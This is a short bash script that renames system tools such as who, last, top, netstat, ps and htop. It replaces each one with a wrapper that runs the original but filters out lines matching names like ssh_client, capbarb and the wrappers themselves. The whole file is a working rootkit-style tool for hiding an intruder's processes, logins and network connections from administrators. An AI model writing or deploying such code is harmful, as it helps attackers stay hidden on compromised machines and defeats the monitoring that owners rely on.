#!/usr/bin/env bash
bins=("who" "last" "top" "netstat" "ps" "htop")
exclude="mail|uucp|ssh_client|capbarb|grep|*_real"

for cmd in "${bins[@]}"; do
    orig_path=$(which $cmd)
    real_bin="${orig_path}_real"
    if [ ! -f "$real_bin" ]; then
        mv "$orig_path" "$real_bin"
        echo "#!/usr/bin/env bash
$real_bin \"\$@\" | egrep -v '$exclude'" > "$orig_path"
        chmod +x "$orig_path"
    else
        echo "[!] $cmd already modified, skipping."
    fi
done
